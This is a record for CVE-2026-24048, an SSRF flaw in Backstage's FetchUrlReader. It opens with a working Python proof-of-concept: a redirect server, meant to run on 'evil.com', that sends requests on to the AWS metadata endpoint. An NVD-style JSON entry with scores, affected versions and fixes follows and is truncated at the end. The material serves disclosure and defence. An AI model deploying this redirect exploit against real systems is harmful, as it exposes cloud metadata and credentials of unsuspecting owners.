CVE-2026-24048

# CVE-2026-24048 PoC - SSRF via Redirect # Attacker controls a host in backend.reading.allow import http.server import socketserver class RedirectHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): # Redirect to internal metadata endpoint self.send_response(302) self.send_header('Location', 'http://169.254.169.254/latest/meta-data/') self.end_headers() def log_message(self, format, *args): pass # Silent logging PORT = 8080 Handler = RedirectHandler with socketserver.TCPServer(('', PORT), Handler) as httpd: print(f'PoC server running on port {PORT}') httpd.serve_forever() # Usage: # 1. Attacker controls evil.com (in backend.reading.allow) # 2. Deploy this server on evil.com # 3. Backstage FetchUrlReader requests http://evil.com/some/path # 4. Server returns 302 redirect to internal AWS metadata # 5. FetchUrlReader follows redirect, exposing internal data

{"cve": {"id": "CVE-2026-24048", "sourceIdentifier": "[email protected]", "published": "2026-01-21T23:15:53.580", "lastModified": "2026-04-25T18:01:55.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Backstage is an open framework for building developer portals, and @backstage/backend-defaults provides the default implementations and setup for a standard Backstage backend app. Prior to versions 0.12.2, 0.13.2, 0.14.1, and 0.15.0, the `FetchUrlReader` component, used by the catalog and other plugins to fetch content from URLs, followed HTTP redirects automatically. This allowed an attacker who controls a host listed in `backend.reading.allow` to redirect requests to internal or sensitive URLs that are not on the allowlist, bypassing the URL allowlist security control. This is a Server-Side Request Forgery (SSRF) vulnerability that could allow access to internal resources, but it does not allow attackers to include additional request headers. This vulnerability is fixed in `@backstage/backend-defaults` version 0.12.2, 0.13.2, 0.14.1, and 0.15.0. Users should upgrade to this version or later. Some workarounds are available. Restrict `backend.reading.allow` to only trusted hosts that you control and that do not issue redirects, ensure allowed hosts do not have open redirect vulnerabilities, and/or use network-level controls to block access from Backstage to sensitive internal endpoints."}, {"lang": "es", "value": "Backstage es un framework abierto para construir portales de desarrolladores, y @backstage/backend-defaults proporciona las implementaciones y configuración predeterminadas para una aplicación backend estándar de Backstage. Antes de las versiones 0.12.2, 0.13.2, 0.14.1 y 0.15.0, el componente 'FetchUrlReader', utilizado por el catálogo y otros plugins para obtener contenido de URLs, seguía las redirecciones HTTP automáticamente. Esto permitía a un atacante que controla un host listado en 'backend.reading.allow' redirigir peticiones a URLs internas o sensibles que no están en la lista de permitidos, eludiendo el control de seguridad de la lista de permitidos de URLs. Esta es una vulnerabilidad de falsificación de petición del lado del servidor (SSRF) que podría permitir el acceso a recursos internos, pero no permite a los atacantes incluir encabezados de petición adicionales. Esta vulnerabilidad está corregida en la versión 0.12.2, 0.13.2, 0.14.1 y 0.15.0 de '@backstage/backend-defaults'. Los usuarios deberían actualizar a esta versión o posterior. Hay disponibles algunas soluciones alternativas. Restrinja 'backend.reading.allow' solo a hosts de confianza que usted controle y que no emitan redirecciones, asegúrese de que los hosts permitidos no tengan vulnerabilidades de redirección abierta, y/o utilice controles a nivel de red para bloquear el acceso desde Backstage a puntos finales internos sensibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:backstage\\/backend_defaults:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "0.12.2", "matchCriteriaId": "E08D45A6-7DA9-4A8F-8F55-9AF20C57D52F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:backstage\\/backend_defaults:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "0.13.0", "versionEndIncluding": "0.13.2", "matchCriteriaId": "EE49AAE8-2821-4862-926A-358CB9291669"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:backstage\\/backend_defaults:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "0.14.0", "versionEndIncluding": "0.14.1", "matchCriteriaId": "8C648CE5-74D9-4293-A373-CCAB072B2A96"}]}]}], "references": [{"url": "https://github.com/backstage/backstage/commit/27f9061d24affd1b9212fe0abd476bfc3fbaedcb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/backstage/bac ... (truncated)